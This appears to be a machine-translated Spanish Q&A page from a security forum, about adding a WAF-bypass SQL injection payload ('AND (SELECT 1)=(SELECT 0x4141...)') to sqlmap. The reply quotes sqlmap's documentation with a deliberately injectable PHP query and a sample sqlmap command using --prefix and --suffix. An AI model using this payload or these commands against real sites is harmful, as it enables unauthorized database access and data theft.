Cómo también usar R0b0tPirates 500 error bypass

0

Tuve una inyección válida, pero no pude explotarla debido a 500 errores, así que miré a mi alrededor y encontré que R0b0t Pirates, un blog que se especializa en herramientas como sqlmap, ha publicado un <500 omisión de error , indicando que de alguna manera agrega esto a la consulta, sin información, pero un título :

+AND(SELECT 1)=(SELECT 0X41414141414141414141414141414141414141414141414141414141414141414141414141414141
4141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141)+

Mi pregunta es cómo agregar esto a la consulta. ¿Lo agrega como un prefijo, un sufijo, una expresión regular?

    
pregunta Sanic Rider 19.01.2016 - 14:29
fuente

1 respuesta

1

La sección "Carga de inyección personalizada" de la Documentación SQLMap Explica cómo agregar un bypass como este. Me parece que usaría --suffix seguido de la cláusula AND que pegó arriba.

Aquí está el texto de la documentación:

  

Carga útil de inyección personalizada

     

Opciones: --prefix and --suffix

     

En algunas circunstancias, el parámetro vulnerable es explotable solo si   El usuario proporciona un sufijo específico para ser añadido a la inyección.   carga útil. Otro escenario en el que estas opciones nos vienen muy presentes.   en sí mismo cuando el usuario ya conoce esa sintaxis de consulta y quiere   Detectar y explotar la inyección SQL al proporcionar directamente una inyección.   prefijo de carga útil y sufijo.

     

Ejemplo de código fuente vulnerable:

$query = "SELECT * FROM users WHERE id=('" . $_GET['id'] . "') LIMIT 0, 1";
     

Para detectar y explotar esta inyección de SQL, puede dejar que sqlmap   detectar los límites (como en la combinación del prefijo de carga útil SQL y   sufijo) para usted durante la fase de detección, o proporcione en su   propio.

     

Por ejemplo:

$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_str_brackets.php?id=1" \
-p id --prefix "')" --suffix "AND ('abc'='abc"
[...]
     

Esto dará como resultado que todas las solicitudes de sqlmap terminen en una consulta como   sigue:

$query = "SELECT * FROM users WHERE id=('1') <PAYLOAD> AND ('abc'='abc') LIMIT 0, 1";
     

Lo que hace que la consulta sea sintácticamente correcta.

     

En este ejemplo simple, sqlmap podría detectar la inyección de SQL y   explotarlo sin necesidad de proporcionar límites personalizados, pero a veces en   aplicación en el mundo real es necesario proporcionarlo cuando el   el punto de inyección está dentro de las consultas JOIN anidadas, por ejemplo.

    
respondido por el mcgyver5 19.01.2016 - 17:44
fuente

Lea otras preguntas en las etiquetas